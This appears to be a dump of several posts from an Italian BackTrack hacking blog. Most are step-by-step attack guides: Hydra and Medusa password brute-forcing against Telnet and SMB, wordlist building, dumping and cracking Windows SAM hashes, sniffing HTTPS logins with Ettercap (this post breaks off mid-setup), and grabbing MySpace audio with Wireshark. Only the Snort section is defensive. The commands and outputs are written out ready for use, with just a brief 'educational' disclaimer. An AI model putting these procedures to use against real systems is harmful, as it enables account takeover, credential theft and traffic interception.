***

Ciao a tutti,

quello che segue non è un vero e proprio tutorial , ma solo un’ altro esempio d’ utilizzo del tool per il login-bruteforcing Hydra.

Hydra , eccellente prodotto della THC-Freeworld , di cui abbiamo già parlato , offre la possibilità di fare bruteforcing su molti tipi di protocolli , quello di seguito è un semplice esempio fatto contro un WindowsServer-2003.spk2 , (nella mia Lan) , tramite il protocollo Telnet.

Il tutorial precedente che trattava di Hydra è stato scritto mentre facevo delle prove sulla casella mail di un mio amico , quindi su protocollo pop3 , utilizzando Hydra-gtk , l’ attuale XHydra contenuto in BackTrack in…

BackTrack –> PrivilegeEscalation –> PasswordAttack –> PasswordOnLineAttack –> “…”

Appena aperto hydra-gtk si presenta con una GUI molto intuitiva , anche per i più ostici non è difficile comprenderne il funzionamento…

***

(Naturalmente la foto rappresenta solo un esempio dell’ interfaccia…)

***

Visto che di hydra abbiamo già parlato in passato , veniamo subito al nostro test , che faccio esclusivamente per poter mettere un video anche a riguardo di Hydra , inserito naturalmente nell’ apposita pagina del blog.

Seguendo il video…

lanciando uno scanning con nmap contro il mio server , con opzioni di service fingerprinting , vediamo subito che la porta 23 del server , all’ indirizzo 29.230.6.73 è aperta ed utilizzata per il servizio Telnet , solito sulla porta 23.

ecco infatti il risultato della scansione…

_______________________________________________

HaCkLaB ~ # nmap -sV -T Aggressive 29.230.6.73

Starting Nmap 4.68 ( http://nmap.org ) at 2008-09-10 13:44 GMT
Interesting ports on 29.230.6.73:
Not shown: 1710 filtered ports
PORT STATE SERVICE VERSION
23/tcp open telnet Microsoft Windows XP telnetd
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2003 microsoft-ds
1027/tcp open IIS?
MAC Address: 00:02:72:61:7B:52 (CC&C Technologies)
Service Info: OSs: Windows XP, Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.891 seconds

_______________________________________________

Ora per iniziare l’ attacco basta crearci un file di testo che poi andremo ad utilizzare come wordlist per le nostre eventuali password… …il file , con estensione *.txt , lo metteremo per comodità nel nostro Desktop , nel mio caso con il nome pwd.txt.

Per avere una wordlist decente ci sono molti mezzi , in passato abbiamo scritto riguardo a wyd e alla raccolta di specifiche wordlist anche attraverso pagine HTML , ma volendo in BackTrack una wordlist compressa è già presente , in /pentest/password/…. dal nome wordlist.txt.tar.gz , quindi basta andare a prenderla e modificarla con in testa al file le nostre eventuali password…

quidni:

_______________________________________________

HaCkLaB ~ # cd /

HaCkLaB / ~ # cd pentest/password/

HaCkLaB pentest/password/ ~ # tar xvfz wordlist.txt.tar.gz

wordlist.txt

HaCkLaB pentest/password/ ~ # SciTE wordlist.txt

_______________________________________________

In questo modo potremo modificare la nostra wordlist con le stringhe che noi vogliamo tramite l’ editor SciTE , anche se ovviamente potete farlo con l’ editor che voi preferite.

Io per comodità , (visto che è solo un esempio pratico…) , ho messo la password komintern alla testa della lista , in questo modo sarà la prima ad essere provata e naturalmente a riuscire.

Bene , vista la scansione possiamo passare i risultati della stessa a XHydra , in questo modo possiamo lanciare l’ attacco…

Come potete vedere dal video , appena compilati tutti i campi necessari Hydra inizia a fare i tentativi di login , secondo le impostazioni che noi abbiamo inserito , nel caso del video , ho inserito 3 task con un timeout di 59 secondi.

il risultato arriva presto…

*** user: Administrator *** password: komintern ***

Alla prossima…

Questo tutorial è stato iniziato da pinguinoninja , oggi lo pubbliuco aggiungendoci qualcosina di mio… …anche se non c’é , per ora , il lavoro di pinguinoninja non manca di sicuro , speriamo di ritrovarlo al più presto tra noi , ci mancail suo lavoro , ma soprattutto… …ci manca lui.

Questo tutorial riguarda l’ uso minimo di Wyd e le wordlist , il componimento e , aggiungo , anche la loro raccolta , quindi coloro che volessero contribuire mettendoci altre wordlist , ogni tot mesi le raccoglierò e farò un update del seguente tutorial.

Ma serve davvero un tutorial sulle wordlist?!?

Se vi state ponendo queste domande sappiate che la risposta è molto semplice: ho trovato che la gestione delle wordlist non era semplice come credevo e crearsene una non è una cosa che si fa in “un pò di tempo libero”. Personalmente, come ogni buon niubbo che si rispetti, incontro molte difficolta nella creazione e gestione delle wordlist; per questo motivo penso che altre persone incontrando le mie stesse difficoltà possano aver bisogno di una piccola guida che li aiuti.

[Usare wordlist esistenti]
Di wordlist se ne trovano a bizzeffe sulla rete, su Openwall.com, ad esempio, troviamo molte wordlist divise per lingua e magari anche per categoria. Personalmente ho scaricato le wordlist in cartelle separate dividendole per lingua e le ho unite in un unico file mettendole in ordine ed eliminando le parole ripetute:

————–
cat wordlist1.txt wordlist2.txt > allWord.txt
————–

in questo modo uniamo il contenuto di “wordlist1.txt” e “wordlist2.txt” nel file “allWord.txt”, quindi non ci resta che ordinarlo e “pulirlo” dai doppioni:

————–
cat allWord.txt | sort | uniq > allWordOrd.txt
————–

[Wyd - Generare wordlist da file]
Questo è il metodo più mirato, nel senso che andremo a creare noi la wordlist. Questo significa che se il target è un fanatico del “Signore Degli Anelli” andremo ad inserire all’interno della wordlist solo parole inerenti alla saga aumentando le nostre chance di successo.
Useremo Wyd presente in BT3 di default e sul sito di Remote-Exploit.org. Wyd prende in input un file o una cartella intera e ne estrapola le stringhe di caratteri che possono formare una parola. Prima di inziare vi dico subito che supporta svariati formati per i file di input:

* plain
* html
* php
* doc
* pdf
* mp3
* ppt
* jpeg
* odt / ods / odp

Notate che supporta la maggior parte dei formati che si incontrano navigando nel web, questo significa che se fate il mirroring di un sito sul vostro Hard Disk usando HTTrack o semplicemente wget avrete a disposizione tantissimi file dal quale estrapolare parole da inserire nella vostra lista. Facciamo un esempio (irreale visto che tratteremo wikipedia):

————-
cd ~
wget -r wikipedia.org
————-

lasciamo che wget copleti il download del sito, quindi usiamo wyd:

————-
cd /usr/local/wyd
./wyd.pl -o ~/wordlistWikipedia.txt ~/wikipedia.org/*
————-

Abbiamo creato nella nostra home il file “wordlistWikipedia.txt” che contiene tutto il contenuto dei file presenti dentro la cartella “~wikipedia.org” dentro la quale abbiamo una copia del sito scaricato. A questo punto possiamo benissimo pulire il file come descritto sopra al fine di eliminare i doppioni e ordinarne il contenuto.

[Gestire le wordlist]
Leggendo il forum di Remote-Exploit.org ho letto un post di shamanvirtuel che spiegava il suo metodo per recuperare spazio dalla gestione delle wordlist, ma più in generale questo metodo funziona per ogni tipo di file. Si tratta di comprimere la wordlist creandone un modulo lzm con dir2lzm.
In pratica si crea una cartella e si mette al suo interno la wordlist che vogliamo comprimere:

————–
mkdir wordlist
mv allWord.txt ./wordlist
————–

quindi si comprime la cartella:

————–
dir2lzm ./wordlist wordlistModule.lzm
————–

Abbiamo creato il modulo “wordlistModule.lzm” che possiamo scompattare velocemente nel momento del bisogno usando lzm2dir:

————–
lzm2dir wordlistModule.lzm
————–

Anche se il tempo di creazione del modulo può risultare molto lungo il vantaggio di risparmiare spazio utile sul proprio laptop è moto alto, in questo modo potete trasportare le vostre wordlist più velocemente da un pc ad un altro (io uso il fisso per creare wordlist perchè è più potente e quindi veloce, al momento del bisogno le passo sul notebook).

Proprio ieri -=Xploitz=- , sul forums.remote-exploit , ha postato due torrent , (reperibili quì…) , che contengono tutte le wordlist raccolte durante il tempo intercorso su altri due post , chi possiede le wordlist inserite nel box del nostro blog le cancelli visto che le ho postate lì la granparte , ma i torrent per coloro che desiderano una wordlist eccezionale sono indispensabili.

Quindi grazie a shamanvirtuel a pureh@te a -=Xploitz=- e a tutto il forums.remote-exploit

Ma torniamo a noi , i due torrent racchiudono quasi 4 GigaBytes di wordlist scompattate , mentre zippate sono circa 350 MegaBytes

Tutti coloro che da oggi hanno scaricato e controllato le wordlist proveniente dai due torrent appena linkti se trovano altre wordlist e vogliono aggiungerle possono farlo benissimo linkandoci l’ url in un commento o  contattandoci nella pagina /c0ntacts ci sono

Ciao a tutti,

eccoci arrivati a descrivere e a testare un altro tool , inserito in BackTrack nella sezione del “Privilege Escalation” , il tool di cui stiamo parlando , già dalla foto , è il Medusa…

…ma cosa è Medusa?
Medusa è un login brute-forcer veloce, modulare, parallelo per servizi di
rete , creato da the geeks [Foofus.net].

Il nome Medusa , deriva proprio dall’obbiettivo principale dei creatori di questo tool , e cioè:

il supporto di quanti più servizi di rete possibili che richiedano l’autenticazione da remoto verso un unico host da attaccare.

I creatori di Medusa individuano 3 caratteristiche principali attribuibili al tool:

Può essere utilizzato contro più hosts, users o passwords contemporaneamnte;

• -Flessibilità dell’input: le informazioni sull’obbiettivo possono essere fornite al

tool in vari modi e ogni attacco può essere diretto a una sola vittima
o a più vittime contemporaneamente;

• design modulare: ogni modulo è presente come un file *.mod indipendente.

Ciò significa che non è necessaria alcuna modifica al “core” del tool per implementare
altre funzioni inizialmente non supportate da Medusa.

Passiamo ora all’uso più prettamente pratico del tool in questione:

Per visualizzare tutte le opzioni che Medusa supporta ci basta digitare
%medusa

l’output sarà:

bt ~ # medusa
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a
different parameter each time and they will all be sent to the module (i.e.
-m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process
the entire username before proceeding.
-f : Stop scanning host after first valid username/password found.
-F : Stop audit after first valid username/password found on any host.
-b : Suppress startup banner
-q : Display module’s usage information
-v [NUM] : Verbose level [0 - 6 (more)]
-w [NUM] : Error debug level [0 - 10 (more)]
-V : Display version

Ora possiamo visualizzare tutti i moduli che sono già implementati all’ interno di Medusa con la
versione installata indicata a lato , diamo quindi da shell il seguente comando:

bt~# medusa -d

ed il nostro sistema ci elencherà i moduli disponibili…

bt ~ # medusa -d
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

Available modules in “.” :

Available modules in “/usr/local/lib/medusa/modules” :
+ cvs.mod : Brute force module for CVS sessions : version 1.0.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0
+ http.mod : Brute force module for HTTP : version 1.3.0
+ imap.mod : Brute force module for IMAP sessions : version 1.1.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1
+ mysql.mod : Brute force module for MySQL sessions : version 1.2
+ nntp.mod : Brute force module for NNTP sessions : version 0.9
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2
+ pop3.mod : Brute force module for POP3 sessions : version 1.1.1
+ postgres.mod : Brute force module for PostgreSQL sessions : version 1.0.0
+ rexec.mod : Brute force module for REXEC sessions : version 1.1.1
+ rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2
+ rsh.mod : Brute force module for RSH sessions : version 1.0.1
+ smbnt.mod : Brute force module for SMB/NTLMv1 sessions : version 1.3.1
+ smtp-auth.mod : Brute force module for SMTP Authentication with TLS : version 0.9.1
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 0.9.1
+ snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0
+ ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2
+ svn.mod : Brute force module for Subversion sessions : version 1.0.0
+ telnet.mod : Brute force module for telnet sessions : version 1.2.1
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.0
+ vnc.mod : Brute force module for VNC sessions : version 1.0.1
+ web-form.mod : Brute force module for web forms : version 0.9
+ wrapper.mod : Generic Wrapper Module : version 1.0.1

Per visualizzare le opzioni riguardanti ciascun modulo è sufficiente digitare:
medusa -M nomemodulo -q

esempio: medusa -M mysql -q (Il modulo utilizzato in questo esempio è mysql.mod)

L’output sarà il seguente:

bt ~ # medusa -M mysql -q
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

mysql.mod (1.2) JoMo-Kun <jmk@foofus.net> :: Brute force module for MySQL sessions

Available module options:
PASS:? (PASSWORD*, HASH)
PASSWORD: Use normal password.
HASH: Use a hash rather than a password. (non-SHA1 hashes only)

(*) Default value

Usage examples:

1: Normal boring check…
medusa -M mysql -h somehost -u someuser -p somepassword

2: Using an old-style MySQL hash…
medusa -M mysql -h somehost -U users.txt -p 39b52a209cf03d62 -m PASS:HASH

Andiamo avanti con il nostro tutorial per capire effettivamente come funziona
Medusa.

Eseguiamo un attacco:
i comandi che seguono servono a Medusa per testare tutte le password contenute nel
file che chiemrò “passwords.txt” contro un singolo user (administrator) sull’host 192.168.0.20 attraverso il protocollo SMB.
I comandi dati dovrebbero essere chiari mentre per l’ -e ns , che non è assolutamente
da tralasciare , serve un’ulteriore spiegazione. Questi infatti serve a per far eseguire al
tool un controllo supplementare , controllo che andrà a verificare che l’administrator abbia lasciato in bianco il campo “password” oppure nel caso in cui “password” e “username” siano gli stessi.

bt~# medusa -h 192.168.0.20 -u administrator -P passwords.txt -e ns -M smbnt

Medusa v1.0-rc1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: (1/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: administrator (2/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: password (3/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass1 (4/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass2 (5/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass3 (6/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass4 (7/7)

L’attacco è stato effettuauto.

La riga di comando in basso ci mostra la funzionalità di Medusa per quanto riguarda l’attacco
parallelo. Qui almeno 20 hosts e 10 users sono attaccati contemporaneamente. L’istruzione -L serve per far
controllare a Medusa un solo username di ogni host specificato.

medusa -H hosts.txt -U users.txt -P passwords.txt -T 20 -t 10 -L -F -M smbnt

Medusa è stata progettata per ricevere da input host/username/password, dati che possono essere usati in un file detto “combo” file , ovvero combinato.

Un file combo può essere specficato tramite l’opzione “-C“.
Il file deve avere i valori formattati per colonna in questo modo:
host:user:password
Se uno dei 3 valori viene lasciato vuoto, la rispettiva informazione deve essere fornita o attraverso una
valutazione globale o attraverso un’apposita lista contenuta in un altro file.
Medusa provvederà a un controllo dei parametri utilizzando la prima riga del file fornitogli.

Le combinazioni utilizzabili in un combo file sono le seguenti:

host:username:password
host:username:
host::
:username:password
:username:
::password
host::password

Quindi riportiamo di seguito il comando per un semplice attacco che controllerà ogni voce riportata
in un combo file:

medusa -M smbnt -C combo.txt

il file combo:
192.168.0.20:administrator:password
192.168.0.20:testuser:pass
192.168.0.30:administrator:blah
192.168.0.40:user1:foopass

Mentre l’esempio succesivo servirà per controllare ogni voce del file combo.txt contro gli obbiettivi
in lista nel file “hosts.txt“.

medusa -M smbnt -C combo.txt -H hosts.txt

il file combo.txt:
administrator:password
testuser:pass
administrator:blah
user1:foopass

Medusa inoltra supporta i files PwDump come combo file; la formattazione di questi file deve essere la
seguente:
user:id:lm:ntlm:::
Medusa cerca ::: alla fine della prima linea per determinare se il file contiene un output PwDump.

***

***

Parlando del Medusa , quì nel «back|track~blog , non è la prima volta che parliamo di Password-Attack , infatti prima di questo tool abbiamo trattato l’ Hydra , attualmente sempre in backtrack , ma visto che su Hydra di video in rete già se ne tovano , abbiamo realizzato un video usando come tool appunto Medusa… …per coloro che volessero vederne le differenze posso recarsi a quest’ indirizzo.

Dal video potete vedere benissimo che abbiamo realizzato due tipi di attacco con Medusa , entrambi diretti su di un unico host , determinato tramite IP , dove la prima volta per effettuare l’ attacco usufruisco di quattro files di testo , hosts.txt [opzione -H] , pass.txt [opzione -P] , user.txt [opzione -U] , e res.txt [opzione -O] , per ottenere il risultato in un file di testo.

Dal video , nel primo caso otteniamo il risultato dal valore immesso tra le parentesi da Medusa , [ad esempio (1/7)] , che ha successo con la prima stringa (1) immessa nel file ; nel secondo caso invece utilizzo un file combo , che contiene le stesse informazioni dei files precedenti , naturalmente inseriti come da spiegazione descritta sopra.

Entrambe riportano come password la stringa “brigante“.

Tutti i files sono contenuti nella directory “/” , in modo da non dover digitare da shell tutti i percorsi dove i files *.txt sono contenuti.
…ciao a tutti e alla prossima.

RedBaron & brigante~

]]> http://carlitobrigante.wordpress.com/2008/03/18/medusa/feed/ 4 ~br1g4nt3~ themedusa.jpg http://carlitobrigante.wordpress.com/2008/01/30/hacking-windows-password-with-backtrack-rainbow-tables/ http://carlitobrigante.wordpress.com/2008/01/30/hacking-windows-password-with-backtrack-rainbow-tables/#comments Wed, 30 Jan 2008 04:10:28 +0000 brigante~ http://carlitobrigante.wordpress.com/?p=264 ]]>

brigante~ for «back|track~blog

http://carlitobrigante.wordpress.com/

IRC:Azzurra.net #backtrack-it

***

“Hacking Windows password with backtrack and RainbowTables”

Ciao a tutti…

In questo articolo/tutorial , spiegherò uno dei metodi per hackerare la password dell’ admin di un O.S. Windows Xp , dal Live CD di backtrack , usufruendo 1) di due tool , 1a) bkhive , e 1b) samdump2.

e 2) usufruendo anche delle Rainbow Tables direttamente da internet

—>Una volta avviato il Live CD della nostra backtrack , individuiamo la partizione con la qual il sistema ha riconosciuto il sistema operativo MS Windows XP. , che nel mio caso si tova in /mnt/sda2

(ATTENZIONE!!! non serve fare il mount di nessuna partizione …..sono tutte riconosciute automaticamente!!!)

—>Apriamo una konsole , e spostiamoci nella directory contenente la partizione Windows Xp , dopodiché ci inoltriamo nell’area di registro di windows contenente il files di testo con le password degli utenti e dell’ administrator del sistema criptate.

—>La prima cosa da fare è dare da konsole il comando bkhive , in modo da attivare il programma.

—>Dopodiché nel mio caso da konsole dovrò spostarmi in: /mnt/sda2/WINDOWS/system32/config/ , ma non lo faccio addentrandomi nella directory con il classico comando “cd” , ma immettendo il percorso dopo il comando bkhive , quindi da konsole:

bkhive /mnt/sda2/WINDOWS/system32/config/system key

come potete notare alla fine del percorso ho aggiunto key per fare in modo che bkhive interagisca con la directory e possa così lavorare.

—>Appena eseguito il comando lanciamo un altro programma , il samdump2 , e lo facciamo in questo modo:

samdump2 /mnt/sda2/WINDOWS/system32/config/SAM key

A questo punto ci ritroveremo nella nostra konsole , i nomi degli utenti con le rispettive password criptate in algoritmo lm. E procediamo con il connetterci ad internet , abilitando da konsole il DHCP con i seguenti comandi , (eseguiti per un interfccia che nel mio caso è l’ ethernet: “eth0“)

ifconfig

ifconfig eth0 up

dhcpcd eth0

—>Una volta connessi ad internet inseriamo nel browser quest’ indirizzo http://plain-text.info

e nella parte alta a sinistra del sito , clickiamo su “submit hash”

Inseriamo i dati nella pagina appena aperta e usciamo , aspettando il tempo necessario al nostro riento nel sito e clickando sulla parte alta a asinistra del sito su “View Rainbow Tables” scoveremo la password che corrisponde all’ hash inserito precedentemente…. Tutto quì!

Ciao a tutti , e alla prossima.

*** Snort (in basso noterete il maialino raffigurato in caratteri:)) , e’ un programma open-source per l’individuazione di intrusioni nella rete…uno sniffing , e tra i migliori in circolazione , incluso nella nostra backtrack2.

Snort supporta controlli della rete basati sull’analisi di firme, protocolli e anomalie. Questo tool e’ in grado di effettuare un’analisi real-time del traffico di rete e di individuare potenziali intrusioni basandosi su un set di regole prestabilite. Snort puo’ inoltre essere utilizzato per rilevare una gamma di attivita’ sospette, inclusi attacchi virus, scan di porte, ‘fingerprinting’ e tentativi di blocco messaggi server (SMB). Le funzionalita’ di Snort possono essere utilizzate attraverso una serie di opzioni da riga di comando che potrebbero confondere un utente alle prime armi. Comunque, e’ presente un’ottima documentazione, e ci sono diversi modi tramite i quali un nuovo utente puo’ imparare ad utlizzare nei suoi vari aspetti. Non dimentichiamo che digitando il nome del programma, in questo caso snort , da terminale seguito dall’ opzione -h , (-help) , ci verranno mostrate tutte le opzioni , le variabili richieste , ed i metodi di input , è cos’ del resto per il 90% dei tool inseriti in backtrack2

br1g4nt3@bt ~ # snort

, ,__ -*> Snort! <*-
o” )~ Version 2.6.1.2 (Build 34)
” ” By Martin Roesch & The Snort Team: http://www.snort.org/team.html
(C) Copyright 1998-2006 Sourcefire Inc., et al

Snort puo’ essere configurato per l’esecuzione in tre modalita’ differenti:

* Sniffer Mode – Questa modalita’ fa si che Snort legga i pacchetti trasmessi sulla rete e ne stampi i contenuti su standard output (lo shcermo).

* Packet Logger Mode – Modalita’ simile alla precedente, la differenza sostanziale e’ che in questa modalita’ i pacchetti sono salvati su disco.

*Network Intrusion Detection System (NIDS) Mode – Visti i propositi di questo tutorial, questa modalita’ e’ una fra le piu’ interessanti. La modalita’ NIDS e’ la piu’ complessa e configurabile fra le tre messe a disposizione da Snort. In questa modalita’, Snort analizza il traffico di rete concordemente con delle regole definite dall’utente, e le esegue di conseguenza

Per configurare snort , ci si serve del file Snort.conf che e’ il file di configurazione di Snort. snort.conf , contiene tutte le impostazioni necessarie all’esecuzione di Snort. Usate un editor di testo per aprire questo file di configurazione , stando naturalmente molto attenti a ciò che vi dice lo stesso file all’ interno delle help’s word , (ovvero quelle stringhe di aiuto che ci dicono come e quali dati dobbiamo inserire ) , perchè e’ una parte essenziale della modalita’ NIDS di Snort. Da questa parte che noi inseriamo manualmente , snort riesce a capire che cosa deve fare e quali device deve monitorare , sono pursempre delle stringhe , e come tali vanno trattate

Per configurare snort.conf apriamo il file in modalità testuale , e usando questo comando:

vi /etc/snort/snort.conf

(oppure come faccio sempre io , mettendo kate al posto di vi , per aprirlo in stile blocco note)

Una volta aperto il file di configurazione di snort , sostituiamo le variabili di default con le variabili riguardanti la nostra rete , ad esempio , IP pubblico , IP privato , device come può essere ath0 , eccetera…

io ad esempio ho inserito nel file di kate:

IP_82.52.xxx.xx/24 e per il dev eth0_192.168.100.1

var HOME_NET [82.52.119.96/24,192.168.100.1/24]

Tutta questa configurazione di rete va eseguita nel caso in cui vogliamo un sniffing in modalità live , che è ben supportata dal nostro snorf , altrimnti se vogliamo lasciarlo lavorare , pur sapendo di ritrovarci alla fina dello sniffing una marea di pacchetti da guardarci a vista , possiamo configurare le variabili di snort in modalità generic sniffing , che poi è solo una delle tante funzioni e si esegue inserendo nel file .conf di snort la variabile any e quindi:

IP_82.52.xxx.xx/24 e per il dev eth0_any

var HOME_NET any
var EXTERNAL_NET any

usando poi i DNS della Telecomitalia ho inserito:

var DNS_SERVERS $HOME_NET 212.216.112.112

Se stessimo lavorando da webserver potremo configurare altre opzioni , perhé è tutto previsto in snort , sia configurazione per prorocolli http , telnet , SMTP , SQL e altri…compreso il protocollo AIM

Per usare nel nostro caso lo snort e farci poi tornare la lista dei pacchetti catturati o i dati di un eventuale intrusione , aggiungiamo l’ opzione -l , che restituirà un file di log con i dati appena citati. Quindi daremo da terminale il comando:

snort -A fast -K ascii -l /var/log/snort -i eth0

dove “-A“esegue snort nella modalità live e quindi rapida , fast e con suono di alert ; “-K ascii -l” indica a snort la modalità del file log

e ” /var/log/snort -i eth0” è la directory in cui il log verrà salvato , seguito dal device “eth0″ che usiamo per lo sniffing.

Ora dopo aver lanciato da terminale il comando sopracitato , snort incomincerà a lavorare , e a catturare pacchetti dieventuali intrusioni , se abbiamo la possibilità , andiamo su di un’ altra macchina , e proviamo d immettere nell’ IP che snort sta monitorando dei pacchetti ICMP*

*piccola nota: I pacchetti ICMP sono i pacchetti appunto del protocollo ICMP, che al contrario di TCP e di UDP non hanno le porte. Il pacchetto ICMP è composto da un numero, che ne definisce il tipo , e una specie di “sottonumero” che ne contiene invece il codice.

Se qualcuno , sicuramente in modo diverso da me che lo faccio solo in rare occasioni , usa la backtrack2 in modalità virtualizzata , (ne ho già parlato in passato) , ad esempio con VMware , può benissimo uscire dalla modalità virtual e inserire pacchetti* sull’ ethernet (dev eth0) , per poi andare a controllare il file di log , che è nella directory indicata nel comando che abbiamo dato per lanciare snort.

*Lanciare pacchetti (!?)…….fate 3/4 ping sul IP dell’host e vedete se snort sta lavorando!

(Se non sapete l’IP della vostra macchina , basta dare , sempre da terminale ifconfig e potete vederlo.)

Ora da terminale , andiamo a vedere cosa ci ha restituito il nostro snort con il comando:

ls /var/log/snort

vedremo che se abbiamno configurato a dovere il file snort.conf , snort ci restituirà un messaggio log , di questo :

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

10/09-2007:00:48.824915 192.168.100.1 -> 192.168.100.18

ICMP TTL:128 TOS:0X0 ID:7631 IPLen:20 DGLen:M60

Tipe:8 Code:0 ID:512 Seq:1586 ECHO

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

È la prima volta che ho usato snort ed è andato tutto a buon fine….quindi è alla portata di tutti coloro che voglio monitorare la propria macchina.

Altri videotutorial , hacking illustrati , articoli e forum su tutte le security-distro GNU/Linux potete trovarli su securitydistro.com

Grazie ad un thrade presente sul Forum-Remote-Exploit , oggi scriverò , (mentre ne farò la prova) , come si può usare la nostra distro GNU/Linux backtrack2 per fare il download di brani musicali da mySpace.

Sper di essere abbastanza chiaro…

Per fare questo lavoro noi ci serviremo di un network analyzator , tra i migliori in circolazione del resto la backtrack non può avere che il meglio

• Cerchiamo la canzone a cui siamo interessati nella pagina degli artisti. Aspettare il caricamento della pagina , e se la canzone parte , fermiamola per il momento.
• Aprite Wireshark , ed incominciate a catturare il traffico sulla vostra interfaccia , che nel mio caso ad esempio , è l’interfaccia ethernet (eth0) selezionandola dalla prima icona , e premete Start.
• Ora con Wireshark che lavora , e cattura , andiamo sulla pagina che ci interessa , quella dove è il brano che avevamo scelto prima e premiamo play per ascoltare la canzone.
• Quando la canzone è finita , tornare su wireshark e premere Stop , si aprirà una nuova finestra di dialogo che permette a wireshark di elencare e raggruppare i pacchetti catturati tramite l’interfaccia eth0.
• Date un semplice click sulla parte bassa della finestra principale di wireshark e premete la combinazione di tasti “Ctrl+F” , si aprirà un’ altra finestra di dialogo dove voi dovrete spuntare “Packett List” e “Stringa” e all’interno della parte scrivibile mettete mp3 , e date lo Start

• Sulla colonna dei protocolli , facciamo attenzione ai pacchetti TCP. Alla destra dell’indicazione appunto TCP dobbiamo cercare una combinazione di 5 numeri.(sono gli unici che hanno 5 numeri , anche nel caso in cui abbiate catturato , come è accaduto appena adesso a me per provare questo How-To…, altri pacchetti perché scarico sempre con aMule , si tratta sempre di porte a 4 numeri , quindi anche se la lista non è corta non è così difficile individuarli).

• Quando abbiamo trovato i pacchetti con la combinazione di questi 5 numeri con il tasto destro selezioniamo “Follow TCP Stream”
• Nella nuova finestra di dialogo che si apre , spuntiamo la casella “raw” e
• Una volta fatta la selezione “raw “, filtriamo” i pacchetti, ma non con il tasto Filter attenzione , ma tramite il menu a discesa vicino al tasto print , sarebbe praticamente un “filtrare” tramite indirizzo , noi dobbiamo scegliere l’indirizzo che una volta selezionato ci mostra sul display la parte di testo più grande e larga.
• Clicchiamo su “Save as” e salviamo il “brano.mp3″ dove vogliamo noi.

Questo è tutto , 10 passi per scaricare tutto la musica che vogliamo da mySpace.

Io , personalmente , ho appena cominciato , e solo per vedere come far funzionare questo tutorial , altrimenti non ero mai entrato in mySpace.

Alla prossima.;)

Disclaimer: Attenzione , questo tutorial , è stato realizzato solo ed esclusivamente per scopi didattici ed informativi. Non vuole essere assolutamente un incoraggiamento al compimento di azioni illegali , del resto la distribuzione GNU/Linux backtrack2 che si studia in questo Blog , è stata creata appositamente per fare in modo che le persone “più” responsabili e ragionevoli riescano a scoprire bug difetti e falle di un determinato sistema , prima delle persone “meno” ragionevoli.

Ciao a tutti,

Grazie alle notizie prese da un thrade sul forum di remote exploit oggi descriveremo come poter fare sniffing di username e password all’interno di una rete LAN , anche se su protocollo HTTPS.

Lo strumento che useremo per fare quest’operazione di sniffing è l’ Ettercap

Per fare in modo di permettere allo sniffer Ettercap di lavorare anche su login protetti da cifratura SSL andiamo in Konsole ed apriamo il file di configurazione etter.conf con il comando:

nano /usr/local/etc/etter.conf

all’interno del file , nella sezione *****Linux***** andremo a “scommentare” , (come funziona anche per le altre distro GNU/Linux , per togliere un commento , si cancella il simbolo “#” che antecede la riga , questo simbolo se presente fà in modo che il sistema legga la riga come appunto , un commento) , le seguenti righe:

___________________________________________

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

___________________________________________

in modo che diventi:

___________________________________________

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

___________________________________________

